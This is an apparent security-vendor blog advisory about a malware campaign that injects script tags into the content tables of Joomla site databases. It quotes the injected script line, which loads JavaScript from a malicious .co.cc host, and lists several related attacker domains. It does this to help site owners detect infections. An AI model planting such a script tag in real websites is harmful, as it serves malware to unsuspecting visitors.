Database Injection on Joomla Websites – yourstatscounter dot cz dot cc

It seems that a good amount of Joomla sites are being infected with malware from the infamous “.cc” domains. All of the hacked sites have the malicious code injected directly in to their databases (SQL injection), via an unknown source (probably a vulnerable extension, but we are still researching the entry point).

This is what is being added to the infected sites (at the top of every post in the jos_content table):

<script type="text/javascript" src="http://yourstatscounter.co.cc/statscounter307.js"></script>

There are many others domains being used in this attack, including:

http://faststatscounter.co.cc/statscounter01935.js

http://yourstatscounter.cz.cc/statscounter301.js

http://yourstatscounter.co.cc/statscounter307.js

http://easystatscounter.co.cc/statscounter12.js

http://supergoogleanalytics.co.cc/

Note that those are different from the Lizamoon SQL injection of a few days ago. The Lizamoon was targeting IIS/ASP.net sites, while this one seems to be targeted only to Joomla sites.

If you are afraid your site might be hacked, check it using our malware scanner. If you need help cleaning it up, let us know.

Scan your website for free:
About David Dede

Sucuri Security bot (crazy work) - Malware research updates, sucuri news and more.